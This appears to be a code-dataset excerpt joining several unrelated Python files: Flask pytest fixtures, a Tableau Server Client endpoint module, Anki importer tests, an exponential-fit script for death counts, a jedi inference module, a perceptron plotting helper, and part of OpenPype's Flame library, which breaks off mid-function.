from urllib.error import URLError
from urllib.request import urlopen
from flask import _request_ctx_stack
@pytest.yield_fixture
def client(app):
"""A Flask test client. An instance of :class:`flask.testing.TestClient`
by default.
"""
with app.test_client() as client:
yield client
@pytest.fixture
def client_class(request, client):
"""Uses to set a ``client`` class attribute to current Flask test client::
@pytest.mark.usefixtures('client_class')
class TestView:
def login(self, email, password):
credentials = {'email': email, 'password': password}
return self.client.post(url_for('login'), data=credentials)
def test_login(self):
assert self.login('<EMAIL>', 'pass').status_code == 200
"""
if request.cls is not None:
request.cls.client = client
class LiveServer(object):
"""The helper class uses to manage live server. Handles creation and
stopping application in a separate process.
:param app: The application to run.
:param host: The host where to listen (default localhost).
:param port: The port to run application.
"""
def __init__(self, app, host, port, clean_stop=False):
self.app = app
self.port = port
self.host = host
self.clean_stop = clean_stop
self._process = None
def start(self):
"""Start application in a separate process."""
def worker(app, host, port):
app.run(host=host, port=port, use_reloader=False, threaded=True)
self._process = multiprocessing.Process(
target=worker,
args=(self.app, self.host, self.port)
)
self._process.start()
# We must wait for the server to start listening with a maximum
# timeout of 5 seconds.
timeout = 5
while timeout > 0:
time.sleep(1)
try:
urlopen(self.url())
timeout = 0
except URLError:
timeout -= 1
def url(self, url=''):
"""Returns the complete url based on server options."""
return 'http://%s:%d%s' % (self.host, self.port, url)
def stop(self):
"""Stop application process."""
if self._process:
if self.clean_stop and self._stop_cleanly():
return
if self._process.is_alive():
# If it's still alive, kill it
self._process.terminate()
def _stop_cleanly(self, timeout=5):
"""Attempts to stop the server cleanly by sending a SIGINT signal and waiting for
``timeout`` seconds.
:return: True if the server was cleanly stopped, False otherwise.
"""
try:
os.kill(self._process.pid, signal.SIGINT)
self._process.join(timeout)
return True
except Exception as ex:
logging.error('Failed to join the live server process: %r', ex)
return False
def __repr__(self):
return '<LiveServer listening at %s>' % self.url()
def _rewrite_server_name(server_name, new_port):
"""Rewrite server port in ``server_name`` with ``new_port`` value."""
sep = ':'
if sep in server_name:
server_name, port = server_name.split(sep, 1)
return sep.join((server_name, new_port))
@pytest.fixture(scope='function')
def live_server(request, app, monkeypatch, pytestconfig):
"""Run application in a separate process.
When the ``live_server`` fixture is applied, the ``url_for`` function
works as expected::
def test_server_is_up_and_running(live_server):
index_url = url_for('index', _external=True)
assert index_url == 'http://localhost:5000/'
res = urllib2.urlopen(index_url)
assert res.code == 200
"""
port = pytestconfig.getvalue('live_server_port')
if port == 0:
# Bind to an open port
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('', 0))
port = s.getsockname()[1]
s.close()
host = pytestconfig.getvalue('live_server_host')
# Explicitly set application ``SERVER_NAME`` for test suite
# and restore original value on test teardown.
server_name = app.config['SERVER_NAME'] or 'localhost'
monkeypatch.setitem(app.config, 'SERVER_NAME',
_rewrite_server_name(server_name, str(port)))
clean_stop = request.config.getvalue('live_server_clean_stop')
server = LiveServer(app, host, port, clean_stop)
if request.config.getvalue('start_live_server'):
server.start()
request.addfinalizer(server.stop)
return server
@pytest.fixture
def config(app):
"""An application config."""
return app.config
@pytest.fixture
def request_ctx(app):
"""The request context which contains all request relevant information,
e.g. `session`, `g`, `flashes`, etc.
"""
return _request_ctx_stack.top
@pytest.fixture(params=['application/json', 'text/html'])
def mimetype(request):
return request.param
def _make_accept_header(mimetype):
return [('Accept', mimetype)]
@pytest.fixture
def accept_mimetype(mimetype):
return _make_accept_header(mimetype)
@pytest.fixture
def accept_json(request):
return _make_accept_header('application/json')
@pytest.fixture
def accept_jsonp():
return _make_accept_header('application/json-p')
@pytest.fixture(params=['*', '*/*'])
def accept_any(request):
return _make_accept_header(request.param)
| en | 0.691301 | #!/usr/bin/env python # -*- coding: utf-8 -*- A Flask test client. An instance of :class:`flask.testing.TestClient` by default. Uses to set a ``client`` class attribute to current Flask test client:: @pytest.mark.usefixtures('client_class') class TestView: def login(self, email, password): credentials = {'email': email, 'password': password} return self.client.post(url_for('login'), data=credentials) def test_login(self): assert self.login('<EMAIL>', 'pass').status_code == 200 The helper class uses to manage live server. Handles creation and stopping application in a separate process. :param app: The application to run. :param host: The host where to listen (default localhost). :param port: The port to run application. Start application in a separate process. # We must wait for the server to start listening with a maximum # timeout of 5 seconds. Returns the complete url based on server options. Stop application process. # If it's still alive, kill it Attempts to stop the server cleanly by sending a SIGINT signal and waiting for ``timeout`` seconds. :return: True if the server was cleanly stopped, False otherwise. Rewrite server port in ``server_name`` with ``new_port`` value. Run application in a separate process. When the ``live_server`` fixture is applied, the ``url_for`` function works as expected:: def test_server_is_up_and_running(live_server): index_url = url_for('index', _external=True) assert index_url == 'http://localhost:5000/' res = urllib2.urlopen(index_url) assert res.code == 200 # Bind to an open port # Explicitly set application ``SERVER_NAME`` for test suite # and restore original value on test teardown. An application config. The request context which contains all request relevant information, e.g. `session`, `g`, `flashes`, etc. | 2.307237 | 2 |
tableauserverclient/server/endpoint/endpoint.py | jorwoods/server-client-python | 1 | 10390 | from .exceptions import (
ServerResponseError,
InternalServerError,
NonXMLResponseError,
EndpointUnavailableError,
)
from functools import wraps
from xml.etree.ElementTree import ParseError
from ..query import QuerySet
import logging
try:
from distutils2.version import NormalizedVersion as Version
except ImportError:
from distutils.version import LooseVersion as Version
logger = logging.getLogger("tableau.endpoint")
Success_codes = [200, 201, 202, 204]
class Endpoint(object):
def __init__(self, parent_srv):
self.parent_srv = parent_srv
@staticmethod
def _make_common_headers(auth_token, content_type):
headers = {}
if auth_token is not None:
headers["x-tableau-auth"] = auth_token
if content_type is not None:
headers["content-type"] = content_type
return headers
@staticmethod
def _safe_to_log(server_response):
"""Checks if the server_response content is not xml (eg binary image or zip)
and replaces it with a constant
"""
ALLOWED_CONTENT_TYPES = ("application/xml", "application/xml;charset=utf-8")
if server_response.headers.get("Content-Type", None) not in ALLOWED_CONTENT_TYPES:
return "[Truncated File Contents]"
else:
return server_response.content
def _make_request(
self,
method,
url,
content=None,
auth_token=None,
content_type=None,
parameters=None,
):
parameters = parameters or {}
parameters.update(self.parent_srv.http_options)
parameters["headers"] = Endpoint._make_common_headers(auth_token, content_type)
if content is not None:
parameters["data"] = content
logger.debug(u"request {}, url: {}".format(method.__name__, url))
if content:
logger.debug(u"request content: {}".format(content[:1000]))
server_response = method(url, **parameters)
self.parent_srv._namespace.detect(server_response.content)
self._check_status(server_response)
# This check is to determine if the response is a text response (xml or otherwise)
# so that we do not attempt to log bytes and other binary data.
if len(server_response.content) > 0 and server_response.encoding:
logger.debug(
u"Server response from {0}:\n\t{1}".format(
url, server_response.content.decode(server_response.encoding)
)
)
return server_response
def _check_status(self, server_response):
if server_response.status_code >= 500:
raise InternalServerError(server_response)
elif server_response.status_code not in Success_codes:
try:
raise ServerResponseError.from_response(server_response.content, self.parent_srv.namespace)
except ParseError:
# This will happen if we get a non-success HTTP code that
# doesn't return an xml error object (like metadata endpoints)
# we convert this to a better exception and pass through the raw
# response body
raise NonXMLResponseError(server_response.content)
except Exception:
# anything else re-raise here
raise
def get_unauthenticated_request(self, url):
return self._make_request(self.parent_srv.session.get, url)
def get_request(self, url, request_object=None, parameters=None):
if request_object is not None:
try:
# Query param delimiters don't need to be encoded for versions before 3.7 (2020.1)
self.parent_srv.assert_at_least_version("3.7")
parameters = parameters or {}
parameters["params"] = request_object.get_query_params()
except EndpointUnavailableError:
url = request_object.apply_query_params(url)
return self._make_request(
self.parent_srv.session.get,
url,
auth_token=self.parent_srv.auth_token,
parameters=parameters,
)
def delete_request(self, url):
# We don't return anything for a delete
self._make_request(self.parent_srv.session.delete, url, auth_token=self.parent_srv.auth_token)
def put_request(self, url, xml_request=None, content_type="text/xml"):
return self._make_request(
self.parent_srv.session.put,
url,
content=xml_request,
auth_token=self.parent_srv.auth_token,
content_type=content_type,
)
def post_request(self, url, xml_request, content_type="text/xml"):
return self._make_request(
self.parent_srv.session.post,
url,
content=xml_request,
auth_token=self.parent_srv.auth_token,
content_type=content_type,
)
def api(version):
"""Annotate the minimum supported version for an endpoint.
Checks the version on the server object and compares normalized versions.
It will raise an exception if the server version is lower than the version specified.
Args:
`version` minimum version that supports the endpoint. String.
Raises:
EndpointUnavailableError
Returns:
None
Example:
>>> @api(version="2.3")
>>> def get(self, req_options=None):
>>> ...
"""
def _decorator(func):
@wraps(func)
def wrapper(self, *args, **kwargs):
self.parent_srv.assert_at_least_version(version)
return func(self, *args, **kwargs)
return wrapper
return _decorator
def parameter_added_in(**params):
"""Annotate minimum versions for new parameters or request options on an endpoint.
The api decorator documents when an endpoint was added, this decorator annotates
keyword arguments on endpoints that may control functionality added after an endpoint was introduced.
The REST API will ignore invalid parameters in most cases, so this raises a warning instead of throwing
an exception.
Args:
Key/value pairs of the form `parameter`=`version`. Kwargs.
Raises:
UserWarning
Returns:
None
Example:
>>> @api(version="2.0")
>>> @parameter_added_in(no_extract='2.5')
>>> def download(self, workbook_id, filepath=None, extract_only=False):
>>> ...
"""
def _decorator(func):
@wraps(func)
def wrapper(self, *args, **kwargs):
import warnings
server_ver = Version(self.parent_srv.version or "0.0")
params_to_check = set(params) & set(kwargs)
for p in params_to_check:
min_ver = Version(str(params[p]))
if server_ver < min_ver:
error = "{!r} not available in {}, it will be ignored. Added in {}".format(p, server_ver, min_ver)
warnings.warn(error)
return func(self, *args, **kwargs)
return wrapper
return _decorator
class QuerysetEndpoint(Endpoint):
@api(version="2.0")
def all(self, *args, **kwargs):
queryset = QuerySet(self)
return queryset
@api(version="2.0")
def filter(self, *args, **kwargs):
queryset = QuerySet(self).filter(**kwargs)
return queryset
@api(version="2.0")
def order_by(self, *args, **kwargs):
queryset = QuerySet(self).order_by(*args)
return queryset
@api(version="2.0")
def paginate(self, **kwargs):
queryset = QuerySet(self).paginate(**kwargs)
return queryset
| en | 0.759296 | 2.39271 | 2 |
spec/test_importer.py | lajohnston/anki-freeplane | 15 | 10391 | import unittest
from freeplane_importer.importer import Importer
from mock import Mock
from mock import MagicMock
from mock import call
from freeplane_importer.model_not_found_exception import ModelNotFoundException
class TestImporter(unittest.TestCase):
def setUp(self):
self.mock_collection = Mock()
self.mock_model = MagicMock()
self.mock_collection.models.byName.return_value = self.mock_model
self.mock_note = MagicMock()
self.mock_note.model.return_value = self.mock_model
self.mock_collection.newNote.return_value = self.mock_note
self.mock_collection.models.fieldNames.return_value = []
self.importer = Importer(self.mock_collection)
self.mock_collection.db.scalar.return_value = None
self.note = {
'id': 100,
'deck': 'History',
'model': 'Basic',
'fields': {}
}
def test_it_should_initialise_the_correct_model(self):
self.importer.import_note(self.note)
self.mock_collection.models.setCurrent.assert_called_with(
self.mock_model)
def test_it_should_select_the_correct_deck(self):
self.mock_collection.decks.id.return_value = 100
self.importer = Importer(self.mock_collection)
self.importer.import_note(self.note)
self.mock_model.__setitem__.assert_called_with('did', 100)
self.mock_collection.decks.id.assert_called_with('History')
def test_it_should_find_the_correct_model(self):
self.importer.import_note(self.note)
self.mock_collection.models.byName.assert_called_with('Basic')
def test_it_should_return_true_if_note_was_added_successfully(self):
self.assertTrue(self.importer.import_note(self.note))
def test_it_should_raise_a_no_model_exception_if_the_model_does_not_exist(self):
self.mock_collection.models.byName.return_value = None
self.assertRaises(ModelNotFoundException,
self.importer.import_note, self.note)
def test_it_should_create_a_new_note(self):
self.importer.import_note(self.note)
self.mock_collection.newNote.assert_called_with()
def test_it_should_get_the_field_names_from_the_model(self):
self.importer.import_note(self.note)
self.mock_collection.models.fieldNames.assert_called_with(
self.mock_model)
def test_it_should_save_the_node_id_if_the_first_field_is_named_id_in_lowercase(self):
self.mock_collection.models.fieldNames.return_value = ['id']
self.importer.import_note(self.note)
self.mock_note.__setitem__.assert_called_with('id', 100)
def test_it_should_save_the_node_id_if_the_first_field_is_named_id_in_uppercase(self):
self.mock_collection.models.fieldNames.return_value = ['ID']
self.importer.import_note(self.note)
self.mock_note.__setitem__.assert_called_with('ID', 100)
def test_it_should_populate_the_note_with_the_field_values(self):
self.note['fields'] = {
'Front': 'Front value',
'Back': 'Back value'
}
self.mock_collection.models.fieldNames.return_value = ['Front', 'Back']
self.importer.import_note(self.note)
self.mock_note.__setitem__.assert_has_calls(
[call('Front', 'Front value'), call('Back', 'Back value')])
def test_it_should_ignore_fields_that_do_not_exist_in_the_model(self):
self.note['fields'] = {
'Front': 'Front value',
'Back': 'Back value'
}
self.mock_collection.models.fieldNames.return_value = ['Front']
self.importer.import_note(self.note)
self.assertFalse('Back' in self.mock_note)
def test_it_should_save_the_note_changes(self):
self.importer.import_note(self.note)
self.mock_note.flush.assert_called_with()
def test_it_should_attempt_to_find_an_existing_note_with_the_given_node_id(self):
self.mock_collection.getNote.return_value = self.mock_note
self.mock_collection.db.scalar.return_value = 123
self.importer.import_note(self.note)
self.mock_collection.getNote.assert_called_with(123)
def test_it_should_add_the_note_to_the_collection_if_it_is_new(self):
del self.mock_note.mod
self.importer.import_note(self.note)
self.mock_collection.addNote.assert_called_with(self.mock_note)
def test_it_should_not_add_the_note_to_the_collection_if_it_is_not_new(self):
self.importer.import_note(self.note)
self.assertEqual(0, self.mock_collection.addNote.call_count)
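# --- Hedged sketch (inferred from the asserts above, not the project's code) ---
# The tests pin down `Importer.import_note` fairly tightly; a minimal
# implementation consistent with them could look like this. The SQL used to
# look up an existing note id is an assumption.
class SketchImporter(object):
    def __init__(self, collection):
        self.collection = collection

    def import_note(self, note):
        model = self.collection.models.byName(note['model'])
        if model is None:
            raise ModelNotFoundException(note['model'])
        self.collection.models.setCurrent(model)
        model['did'] = self.collection.decks.id(note['deck'])
        existing_id = self.collection.db.scalar(
            'select id from notes where id = ?', note['id'])  # assumed query
        if existing_id:
            anki_note = self.collection.getNote(existing_id)
        else:
            anki_note = self.collection.newNote()
        field_names = self.collection.models.fieldNames(model)
        if field_names and field_names[0].lower() == 'id':
            anki_note[field_names[0]] = note['id']
        for name, value in note['fields'].items():
            if name in field_names:
                anki_note[name] = value
        if not hasattr(anki_note, 'mod'):  # new notes lack a modification time
            self.collection.addNote(anki_note)
        anki_note.flush()
        return True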
| none | 1 | 2.546978 | 3 |
analysis/fitexp.py | mfkasim91/idcovid19 | 0 | 10392 | import argparse
import numpy as np
from scipy.stats import linregress
import matplotlib.pyplot as plt
parser = argparse.ArgumentParser()
parser.add_argument("--plot", action="store_const", default=False, const=True)
args = parser.parse_args()
data = np.loadtxt("../data/data.csv", skiprows=1, usecols=list(range(1,8)), delimiter=",")[33:,:]
xdays = data[:,0] - np.mean(data[:,0])
deaths = data[:,-1]
print(xdays, deaths)
logdeaths = np.log(deaths)
slope, offset, rval, pval, stderr = linregress(xdays, logdeaths)
# residual standard error of the slope, recomputed from the fit residuals
stderr = np.sqrt(np.sum((logdeaths - (slope*xdays + offset))**2) / (len(logdeaths) - 2.)) / np.sqrt(np.sum((xdays - np.mean(xdays))**2))
if args.plot:
plt.plot(xdays, np.exp(offset + slope*xdays), 'C0-')
plt.plot(xdays, np.exp(offset + (slope+stderr)*xdays), 'C0--')
plt.plot(xdays, np.exp(offset + (slope-stderr)*xdays), 'C0--')
plt.plot(xdays, deaths, 'C0o')
plt.gca().set_yscale("log")
plt.show()
print("Slope: %.3e" % slope)
print("Doubling every: %.2f" % (np.log(2)/slope))
print("R-squared: %.3f" % (rval*rval))
print("Stderr: %.3e" % stderr)
| none | 1 | 2.924307 | 3 |
.venv/lib/python3.7/site-packages/jedi/inference/lazy_value.py | ITCRStevenLPZ/Proyecto2-Analisis-de-Algoritmos | 76 | 10393 |
from jedi.inference.base_value import ValueSet, NO_VALUES
from jedi.common import monkeypatch
class AbstractLazyValue(object):
def __init__(self, data, min=1, max=1):
self.data = data
self.min = min
self.max = max
def __repr__(self):
return '<%s: %s>' % (self.__class__.__name__, self.data)
def infer(self):
raise NotImplementedError
class LazyKnownValue(AbstractLazyValue):
"""data is a Value."""
def infer(self):
return ValueSet([self.data])
class LazyKnownValues(AbstractLazyValue):
"""data is a ValueSet."""
def infer(self):
return self.data
class LazyUnknownValue(AbstractLazyValue):
def __init__(self, min=1, max=1):
super(LazyUnknownValue, self).__init__(None, min, max)
def infer(self):
return NO_VALUES
class LazyTreeValue(AbstractLazyValue):
def __init__(self, context, node, min=1, max=1):
super(LazyTreeValue, self).__init__(node, min, max)
self.context = context
# We need to save the predefined names. It's an unfortunate side effect
# that needs to be tracked otherwise results will be wrong.
self._predefined_names = dict(context.predefined_names)
def infer(self):
with monkeypatch(self.context, 'predefined_names', self._predefined_names):
return self.context.infer_node(self.data)
def get_merged_lazy_value(lazy_values):
if len(lazy_values) > 1:
return MergedLazyValues(lazy_values)
else:
return lazy_values[0]
class MergedLazyValues(AbstractLazyValue):
"""data is a list of lazy values."""
def infer(self):
return ValueSet.from_sets(l.infer() for l in self.data)
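# --- Hedged usage sketch (illustration only; relies on jedi internals) ---
# Known lazies infer to a ValueSet around their payload, unknown lazies infer
# to NO_VALUES, and a merged lazy unions the inferences of its parts.
# `FakeValue` is a hypothetical stand-in for a real jedi Value object.
if __name__ == "__main__":
    class FakeValue(object):
        pass

    known = LazyKnownValue(FakeValue())
    unknown = LazyUnknownValue()
    merged = get_merged_lazy_value([known, unknown])
    print(known.infer())    # ValueSet containing the fake value
    print(unknown.infer())  # NO_VALUES (the empty set)
    print(merged.infer())   # union of the two inferences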
| en | 0.894648 | 2.448808 | 2 |
percept/plot.py | joshleeb/PerceptronVis | 0 | 10394 |
import matplotlib.lines as lines
import matplotlib.pyplot as plt
COLOR_CLASSIFICATIONS = [
'black', # Unclassified
'blue', # Classified True (1)
'red' # Classified False (0)
]
def generate_line(ax, p0, p1, color='black', style='-'):
'''
Generates a line between points p0 and p1 which extends to be the width of
the plot.
'''
x0, y0 = p0
x1, y1 = p1
gradient = (y0 - y1) / (x0 - x1)
intercept = y1 - gradient * x1
x = ax.get_xlim()
data_y = [x[0] * gradient + intercept, x[1] * gradient + intercept]
return lines.Line2D(x, data_y, color=color, linestyle=style)
def get_boundary_plot_fn(weights):
'''
Gets the function used to plot the decision boundary line represented by the
perceptron's weights. The equation is: f(x) = -(w1/w2)x - w0/w2.
'''
def fn(x):
return -weights[1] / weights[2] * x - weights[0] / weights[2]
return fn
def get_point_color(point, colors):
'''
Gets the color of the point to be displayed.
'''
if point.classification is None:
return colors[0]
return colors[1] if point.classification else colors[2]
def generate(title, class_boundary, weights, points, bounds):
'''
Generates a scatter plot of points with the actual classification boundary
and the perceptron's classification boundary drawn in.
'''
boundary_fn = get_boundary_plot_fn(weights)
fig, ax = plt.subplots(figsize=(8, 8))
ax.set_xlim(bounds[0])
ax.set_ylim(bounds[1])
ax.set_title(title)
ax.add_line(generate_line(
ax, class_boundary[0], class_boundary[1], 'cyan', '--'
))
ax.add_line(generate_line(ax, (0, boundary_fn(0)), (1, boundary_fn(1))))
ax.scatter(
[pt.x for pt in points], [pt.y for pt in points],
c=[get_point_color(pt, COLOR_CLASSIFICATIONS) for pt in points], s=30
)
return fig
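# --- Hedged usage sketch (not in the original module) ---
# `generate` only needs point objects exposing .x, .y and .classification,
# so a namedtuple is enough to drive it. All values below are made up.
if __name__ == "__main__":
    from collections import namedtuple

    Point = namedtuple('Point', ['x', 'y', 'classification'])
    points = [
        Point(0.2, 0.3, True),
        Point(0.7, 0.8, False),
        Point(0.5, 0.5, None),  # unclassified -> plotted black
    ]
    fig = generate(
        title='Perceptron decision boundary',
        class_boundary=((0.0, 0.0), (1.0, 1.0)),  # true boundary, two points
        weights=[0.1, 1.0, -1.0],                 # [w0, w1, w2], w2 != 0
        points=points,
        bounds=((0.0, 1.0), (0.0, 1.0)),
    )
    fig.savefig('perceptron_demo.png')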
| en | 0.891626 | 3.863605 | 4 |
openpype/hosts/flame/api/lib.py | j-cube/OpenPype | 1 | 10395 | import sys
import os
import re
import json
import pickle
import tempfile
import itertools
import contextlib
import xml.etree.cElementTree as cET
from copy import deepcopy
from xml.etree import ElementTree as ET
from pprint import pformat
from .constants import (
MARKER_COLOR,
MARKER_DURATION,
MARKER_NAME,
COLOR_MAP,
MARKER_PUBLISH_DEFAULT
)
import openpype.api as openpype
log = openpype.Logger.get_logger(__name__)
FRAME_PATTERN = re.compile(r"[\._](\d+)[\.]")
class CTX:
# singleton used for passing data between api modules
app_framework = None
flame_apps = []
selection = None
@contextlib.contextmanager
def io_preferences_file(klass, filepath, write=False):
try:
flag = "w" if write else "r"
yield open(filepath, flag)
except IOError as _error:
klass.log.info("Unable to work with preferences `{}`: {}".format(
filepath, _error))
class FlameAppFramework(object):
# flameAppFramework class takes care of preferences
class prefs_dict(dict):
def __init__(self, master, name, **kwargs):
self.name = name
self.master = master
if not self.master.get(self.name):
self.master[self.name] = {}
self.master[self.name].__init__()
def __getitem__(self, k):
return self.master[self.name].__getitem__(k)
def __setitem__(self, k, v):
return self.master[self.name].__setitem__(k, v)
def __delitem__(self, k):
return self.master[self.name].__delitem__(k)
def get(self, k, default=None):
return self.master[self.name].get(k, default)
def setdefault(self, k, default=None):
return self.master[self.name].setdefault(k, default)
def pop(self, *args, **kwargs):
return self.master[self.name].pop(*args, **kwargs)
def update(self, mapping=(), **kwargs):
self.master[self.name].update(mapping, **kwargs)
def __contains__(self, k):
return self.master[self.name].__contains__(k)
def copy(self): # don"t delegate w/ super - dict.copy() -> dict :(
return type(self)(self)
def keys(self):
return self.master[self.name].keys()
@classmethod
def fromkeys(cls, keys, v=None):
return cls.master[cls.name].fromkeys(keys, v)
def __repr__(self):
return "{0}({1})".format(
type(self).__name__, self.master[self.name].__repr__())
def master_keys(self):
return self.master.keys()
def __init__(self):
self.name = self.__class__.__name__
self.bundle_name = "OpenPypeFlame"
# self.prefs scope is limited to flame project and user
self.prefs = {}
self.prefs_user = {}
self.prefs_global = {}
self.log = log
try:
import flame
self.flame = flame
self.flame_project_name = self.flame.project.current_project.name
self.flame_user_name = flame.users.current_user.name
except Exception:
self.flame = None
self.flame_project_name = None
self.flame_user_name = None
import socket
self.hostname = socket.gethostname()
if sys.platform == "darwin":
self.prefs_folder = os.path.join(
os.path.expanduser("~"),
"Library",
"Caches",
"OpenPype",
self.bundle_name
)
elif sys.platform.startswith("linux"):
self.prefs_folder = os.path.join(
os.path.expanduser("~"),
".OpenPype",
self.bundle_name)
self.prefs_folder = os.path.join(
self.prefs_folder,
self.hostname,
)
self.log.info("[{}] waking up".format(self.__class__.__name__))
try:
self.load_prefs()
except RuntimeError:
self.save_prefs()
# menu auto-refresh defaults
if not self.prefs_global.get("menu_auto_refresh"):
self.prefs_global["menu_auto_refresh"] = {
"media_panel": True,
"batch": True,
"main_menu": True,
"timeline_menu": True
}
self.apps = []
def get_pref_file_paths(self):
prefix = self.prefs_folder + os.path.sep + self.bundle_name
prefs_file_path = "_".join([
prefix, self.flame_user_name,
self.flame_project_name]) + ".prefs"
prefs_user_file_path = "_".join([
prefix, self.flame_user_name]) + ".prefs"
prefs_global_file_path = prefix + ".prefs"
return (prefs_file_path, prefs_user_file_path, prefs_global_file_path)
def load_prefs(self):
(proj_pref_path, user_pref_path,
glob_pref_path) = self.get_pref_file_paths()
with io_preferences_file(self, proj_pref_path) as prefs_file:
self.prefs = pickle.load(prefs_file)
self.log.info(
"Project - preferences contents:\n{}".format(
pformat(self.prefs)
))
with io_preferences_file(self, user_pref_path) as prefs_file:
self.prefs_user = pickle.load(prefs_file)
self.log.info(
"User - preferences contents:\n{}".format(
pformat(self.prefs_user)
))
with io_preferences_file(self, glob_pref_path) as prefs_file:
self.prefs_global = pickle.load(prefs_file)
self.log.info(
"Global - preferences contents:\n{}".format(
pformat(self.prefs_global)
))
return True
def save_prefs(self):
# make sure the preference folder is available
if not os.path.isdir(self.prefs_folder):
try:
os.makedirs(self.prefs_folder)
except Exception:
self.log.info("Unable to create folder {}".format(
self.prefs_folder))
return False
# get all pref file paths
(proj_pref_path, user_pref_path,
glob_pref_path) = self.get_pref_file_paths()
with io_preferences_file(self, proj_pref_path, True) as prefs_file:
pickle.dump(self.prefs, prefs_file)
self.log.info(
"Project - preferences contents:\n{}".format(
pformat(self.prefs)
))
with io_preferences_file(self, user_pref_path, True) as prefs_file:
pickle.dump(self.prefs_user, prefs_file)
self.log.info(
"User - preferences contents:\n{}".format(
pformat(self.prefs_user)
))
with io_preferences_file(self, glob_pref_path, True) as prefs_file:
pickle.dump(self.prefs_global, prefs_file)
self.log.info(
"Global - preferences contents:\n{}".format(
pformat(self.prefs_global)
))
return True
def get_current_project():
import flame
return flame.project.current_project
def get_current_sequence(selection):
import flame
def segment_to_sequence(_segment):
track = _segment.parent
version = track.parent
return version.parent
process_timeline = None
if len(selection) == 1:
if isinstance(selection[0], flame.PySequence):
process_timeline = selection[0]
if isinstance(selection[0], flame.PySegment):
process_timeline = segment_to_sequence(selection[0])
else:
for segment in selection:
if isinstance(segment, flame.PySegment):
process_timeline = segment_to_sequence(segment)
break
return process_timeline
def rescan_hooks():
import flame
try:
flame.execute_shortcut('Rescan Python Hooks')
except Exception:
pass
def get_metadata(project_name, _log=None):
# TODO: can be replaced by MediaInfoFile class method
from adsk.libwiretapPythonClientAPI import (
WireTapClient,
WireTapServerHandle,
WireTapNodeHandle,
WireTapStr
)
class GetProjectColorPolicy(object):
def __init__(self, host_name=None, _log=None):
# Create a connection to the Flame Wiretap (IFFFS) server using the Wiretap
# python API.
#
self.log = _log or log
self.host_name = host_name or "localhost"
self._wiretap_client = WireTapClient()
if not self._wiretap_client.init():
raise Exception("Could not initialize Wiretap Client")
self._server = WireTapServerHandle(
"{}:IFFFS".format(self.host_name))
def process(self, project_name):
policy_node_handle = WireTapNodeHandle(
self._server,
"/projects/{}/syncolor/policy".format(project_name)
)
self.log.info(policy_node_handle)
policy = WireTapStr()
if not policy_node_handle.getNodeTypeStr(policy):
self.log.warning(
"Could not retrieve policy of '%s': %s" % (
policy_node_handle.getNodeId().id(),
policy_node_handle.lastError()
)
)
return policy.c_str()
policy_wiretap = GetProjectColorPolicy(_log=_log)
return policy_wiretap.process(project_name)
def get_segment_data_marker(segment, with_marker=None):
"""
Get openpype track item tag created by creator or loader plugin.
Attributes:
segment (flame.PySegment): flame api object
with_marker (bool)[optional]: if true it will return also marker object
Returns:
dict: openpype tag data
Returns(with_marker=True):
flame.PyMarker, dict
"""
for marker in segment.markers:
comment = marker.comment.get_value()
color = marker.colour.get_value()
name = marker.name.get_value()
if (name == MARKER_NAME) and (
color == COLOR_MAP[MARKER_COLOR]):
if not with_marker:
return json.loads(comment)
else:
return marker, json.loads(comment)
def set_segment_data_marker(segment, data=None):
"""
Set openpype track item tag to input segment.
Attributes:
segment (flame.PySegment): flame api object
Returns:
dict: json loaded data
"""
data = data or dict()
marker_data = get_segment_data_marker(segment, True)
if marker_data:
# get available openpype tag if any
marker, tag_data = marker_data
# update tag data with new data
tag_data.update(data)
# update marker with tag data
marker.comment = json.dumps(tag_data)
else:
# update tag data with new data
marker = create_segment_data_marker(segment)
# add tag data to marker's comment
marker.comment = json.dumps(data)
def set_publish_attribute(segment, value):
""" Set Publish attribute in input Tag object
Attribute:
segment (flame.PySegment)): flame api object
value (bool): True or False
"""
tag_data = get_segment_data_marker(segment)
tag_data["publish"] = value
# set data to the publish attribute
set_segment_data_marker(segment, tag_data)
def get_publish_attribute(segment):
""" Get Publish attribute from input Tag object
Attribute:
segment (flame.PySegment)): flame api object
Returns:
bool: True or False
"""
tag_data = get_segment_data_marker(segment)
if not tag_data:
set_publish_attribute(segment, MARKER_PUBLISH_DEFAULT)
return MARKER_PUBLISH_DEFAULT
return tag_data["publish"]
def create_segment_data_marker(segment):
""" Create openpype marker on a segment.
Attributes:
segment (flame.PySegment): flame api object
Returns:
flame.PyMarker: flame api object
"""
# get duration of segment
duration = segment.record_duration.relative_frame
# calculate start frame of the new marker
start_frame = int(segment.record_in.relative_frame) + int(duration / 2)
# create marker
marker = segment.create_marker(start_frame)
# set marker name
marker.name = MARKER_NAME
# set duration
marker.duration = MARKER_DURATION
# set colour
marker.colour = COLOR_MAP[MARKER_COLOR] # Red
return marker
def get_sequence_segments(sequence, selected=False):
segments = []
# loop versions in sequence
for ver in sequence.versions:
# loop track in versions
for track in ver.tracks:
# ignore all empty tracks and hidden too
if len(track.segments) == 0 and track.hidden:
continue
# loop all segment in remaining tracks
for segment in track.segments:
if segment.name.get_value() == "":
continue
if segment.hidden.get_value() is True:
continue
if (
selected is True
and segment.selected.get_value() is not True
):
continue
# add it to original selection
segments.append(segment)
return segments
@contextlib.contextmanager
def maintained_segment_selection(sequence):
"""Maintain selection during context
Attributes:
sequence (flame.PySequence): python api object
Yield:
list of flame.PySegment
Example:
>>> with maintained_segment_selection(sequence) as selected_segments:
... for segment in selected_segments:
... segment.selected = False
>>> print(segment.selected)
True
"""
selected_segments = get_sequence_segments(sequence, True)
try:
# do the operation on selected segments
yield selected_segments
finally:
# reset all selected clips
reset_segment_selection(sequence)
# select only original selection of segments
for segment in selected_segments:
segment.selected = True
def reset_segment_selection(sequence):
"""Deselect all selected nodes
"""
for ver in sequence.versions:
for track in ver.tracks:
if len(track.segments) == 0 and track.hidden:
continue
for segment in track.segments:
segment.selected = False
def _get_shot_tokens_values(clip, tokens):
old_value = None
output = {}
if not clip.shot_name:
return output
old_value = clip.shot_name.get_value()
for token in tokens:
clip.shot_name.set_value(token)
_key = str(re.sub("[<>]", "", token)).replace(" ", "_")
try:
output[_key] = int(clip.shot_name.get_value())
except ValueError:
output[_key] = clip.shot_name.get_value()
clip.shot_name.set_value(old_value)
return output
def get_segment_attributes(segment):
if segment.name.get_value() == "":
return None
# Add timeline segment to tree
clip_data = {
"shot_name": segment.shot_name.get_value(),
"segment_name": segment.name.get_value(),
"segment_comment": segment.comment.get_value(),
"tape_name": segment.tape_name,
"source_name": segment.source_name,
"fpath": segment.file_path,
"PySegment": segment
}
# head and tail with forward compatibility
if segment.head:
